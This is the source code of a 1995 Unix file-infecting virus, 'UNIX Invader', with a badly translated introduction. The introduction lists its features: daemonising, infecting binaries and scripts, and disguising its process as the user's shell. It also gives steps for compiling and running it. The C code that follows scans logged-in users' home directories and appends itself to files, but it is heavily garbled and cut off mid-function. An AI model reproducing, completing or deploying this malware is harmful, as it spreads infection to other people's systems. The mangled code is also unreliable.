This is a computer virus under Unix, Virus Name: UNIX Invader (invader)
It features: 1. It has the characteristics of Daemon Process (Lose Control TTY), which is not online, which can still be implemented, will not be terminated by the system. 2. It can be infected with Script File and various types on Unix Binary file (of course, it is suitable), not repeated infection. After infection, the execution document or Script File still executes ... (it seems to be nonsense) 3. The hidden method used on the memory is to scan Passwd file. , Use the User's login shell basename as a program name, so use PS -AUX (single PS) or TOP, you have to look at it carefully ... (a bit treacherous) 4. It does not repeat the long resident, and one of the USER is a user. It is to expand the ability to expand infection. The benefits are not high, so do it ... (Don't tell me kill -9 pid is invincible, I still have a way) How do I experiment? CP a few binary files to your home Directory, do a few starting fonts are # Script file .... How to start? 1. Set this file to filename.c2. gcc -o -o virus @ filename.c or cc -o -o virus @ filename.c ^ ^ is important ! 3. Then there will be some warnings, manage it ...., then there should be a virus @ file display 4. LS -L look at the (Virus @) file length, remember .5. Use vi or any editor to change the #define behind the #define in FileName.c (Local Here) 6. Then revitalize the second step, then the resulting Virus @ is what we want. 7. Execution It ... ok! :)
8. You are poisoned (10 seconds) ........ Once there is a suitable file, you will be infected immediately ... Others: 1. This Virus, the younger brother did not make a part, because destruction Everyone will do it, I don't want to waste energy to think about a cruel destruction ...... Interested people can add .... 2. This Virus is executed under UNIX job system Therefore, proved a little .... As long as there is human, there is nothing impossible to have Virus's Environment, and the method is what people think. 3. If you look at this poison with a system administrator, you can also get a conclusion. This Virus is infected, is quite high by Crack. 4. This Virus is currently the starter of the online Directory in line, in fact, if the user's directory has a Dynamic Symbolic Link to the root directory Next, Search may sweep the directory of the entire Wrok station. 5. This Virus scans the directory from time to time, the internal default is 10 seconds, wake up once, so as not to be discovered ...:) 6. This Virus is not recognizing people. So your own directory will be infected, and your surname setting is useless, so move forward before the experiment! 7. Any experiment, this virus is quite unethical, the author is quite unethical, the author is Our own Linux, you ... you ... you have a good self, being caught or kick, don't tell you, HTK, don't tell you first. Do you have fun!
Note: Dark Slayer is the current Taiwan Power Virus Orginization head is also ... 1995/6/15> * /
/ * A VIRUS IN UNIX !!!! * // * written by NCKU EE htk * / # include # include # include # include # include # include # include # include # include # include # include # include # include # include # Include # incrude # incrude
#define chK 512 # Define perm s_irwxu # define chkt 10 # define loader "/ nrm -f /tmp/.@gawhoami`; Cat <" #define loader2 "| tail -c 18606> / tmp /.@`.. CHMOD 700 / TMP /.@ `Whoami`; / tmp /.@` WHOAMI`; RM -F /TMP/.@`whoami`Exit;/n"/* ^^^^^^^^^ * / # define VL 18606 / * and ^^^^^ Here !!! * / # Define VLL -VL # define buffs 25088 # Define BSI 80 # define EXE 1 # define SCR 2Struct Flock Bk; Int fo, F, STATUS = NULL; INT flagn = 0; void main (argc, argv, envp) int Argc; char * argv []; char * envp []; {char * buf2, * fname; static char PIDP [BSI] = "/ TMP /."; atstatic char bufr [bsi] = ""; static int dec; unsigned int k, kep; struct passwd * getp; int Caller (void); int CHEC (int); char * base (char *); char * * Find (void); void catch (void); int Check (char *, int); Signal (SigCLD, SIG_IGN);
STRCAT (PIDP, ECVT (Double) GetUID (), CHEC (GetUID ()), & DEC, & DEC);
FNAME = (char *) Tempnam ("/ tmp", null; buf2 = (char *) malloc (bufsize); if ((fo = open (argv [0], o_rdonly) <0 || (f = creat (FNAME, PERM) <0) EXIT (1); IF ((Kep = Lseek (FO, 0L, 2))> 2 * VL) {Lseek (FO, VLL, 2); K = Read (Fo, BUF2 , VL); Write (F, BUF2, K); Lseek (FO, VL, 0); while ((k = read (fo, buf2, bufsize)> 0) Write (f, buf2, k); / * Ignore more Lefting Virus in a tail * /} else {Lseek (FO, VL-KEP, 2); K = Read (Fo, BUF2, KEP-VL); Write (F, BUF2, K);} close (f) CHMOD (FNAME, S_IRWXU); Free (buf2);
IF ((Kep = fork ())> 0) {for (k = 0; k if (* (argv [0] k) == '@') EXIT (0); Execve (FName, Argv, ENVP) } elseif (Kep == 0) {Sleep (2); unlink (fname);
For (k = 0; k getp = (struct passwd *) getPwUID (GetUID ()); strcpy (Argv [0], Base (getp-> pw_shell);
/ * Initialize Daemon Process ... * /
For (k = 0; k <2; k ) close (k); umask (0); if (fork ()! = 0) exit (0); Signal (SIGHUP, SIG_IGN); SIGNAL (SIGINT, SIG_IGN); Signal (SIGTTOU, SIG_IGN); setPgrp (); if ((Kep = Open ("/ dev / tty", o_rdwr)> = 0) {IOCTL (Kep, Tiocnotty, (char *) 0); Close (KEP) } IF (fork ()! = 0) EXIT (0); Signal (SIGUSR1, CATCH); IF ((Kep = Open (PIDP, O_CREAT | O_RDWR, S_IRUSR | S_IWUSR) <0) Exit (1); K = Read (Kep, BUFR, BSI); IF (K! = 0) Kill (ATOI (BUFR), SIGUSR1;
STRCPY (BUFR, ECVT ((Double) getPID (), CHEC (getPid ()), & DC, & DEC); Lseek (Kep, 0L, 0); Do {k = Write (Kep, BUFR, Strlen (PIDP) 1); WHILE ((buf2 = find ())! = Null) {getp = (struct passwd *) getPwnam (buf2); if (chdir ((BUF2 = (char *) getp-> pw_dir)) <0) Continue ; if (FTW (BUF2, CALLER, 15)! = 0) Continue;}
SLEEP (CHKT); setutent (); Lseek (Kep, 0L, 0);} while (1);}} int CHEC (NUM) INT NUM; {Int y = 1; while ((Num = (int) (NUM) / 10))> = 1) y ; return (y);} void catch (void) {Flagn = 1;}
Char * base (poi) char * poi; {INT i; for (i = (Strlen (POI) -1); i> = 0; i -) IF (* (POI i) == '/') Return ((char *) (POI i 1)); Return ("sh");} char * find () {static char name [9] = ""; struct utmp * goal; goal = (Struct Utmp * Getutent (); if (goal-> ut_type == user_process) {structure (name, goal-> ut_use); return (name);} if (goal == (struct utmp *) NULL) Return (null);}
Int Caller (Name, Statptr, Type) Char * name; struct stat * statptr; int type; {unsigned int Nread, ymode; static char loading [200]; char buf [vl], buf3 [vl]; if (Type = = Ftw_f) {ymode = statptr-> ST_MODE; if (check (name, ymode) <0) {if (statvice ()) chmod (Name, YMode); return (0);} IF Status == SCR) {STRCPY (LOAD, LOADER); STRCAT (LOAD, NAME); STRCAT (LOAD, LOADER2); LSEEK (F, 0L, 2); Write (f, loading, strlen (loading); lseek FO, 0L, 0); NREAD = Read (FO, BUF, VL); Write (F, BUF, NREAD);} if (status == exe) {if (statptr-> st_size> VL) {Lseek (f, 0L, 0); NREAD = Read (F, BUF, VL); Lseek (F, 0L, 2); Write (F, BUF, NREAD); Lseek (FO, 0L, 0); NREAD = Read (fo, BUF , VL); Lseek (F, 0L, 0); Write (F, BUF, NREAD);} else {Lseek (f, 0l, 0); Nread = Read (f, buf3, vl); ymode = nread; lseek (FO, 0L, 0); NREAD = Read (FO, BUF, VL); Lseek (F, 0L, 0); Write (F, BUF, NREAD); Write (f, buf3, ymode);}} / * Lseek (f, 0l, 0); Lockf (f, f_ulock, 0); * // * Author's Linux Library Has No Above Program Library * /
BK.L_TYPE = f_unlck; bk.l_whence = 0; bk.l_len = 0; bk.l_start = 0; FCNTL (f, f_setlk, & bk);
IF (statptr-> st_uid == getuid ()) chmod (name, ymode); close (f);}} (Flagn) exit (0); return (0);} int Check (name, ymode) char * Name ; int ymode; {char CH [CHK]; char CH2 [CHK]; int RD, I; status = (int) NULL; IF ((f = open (name, o_rdwr)) <0) {ix (chmod (Name , YMODE | S_IRUSR | S_IWUSR) <0) Return (-1); IF ((f = Open (Name, O_RDWR)) <0) return (-1);} / * if (Lockf (F, F_Tlock, 0) <0) {close (f); return (-1);} * /
BK.L_TYPE = f_wrlck; bk.l_whence = 0; bk.l_len = 0; bk.l_start = 0; if (Fcntl (f, f_setlk, & b) <0) {close (f); return (-1);}
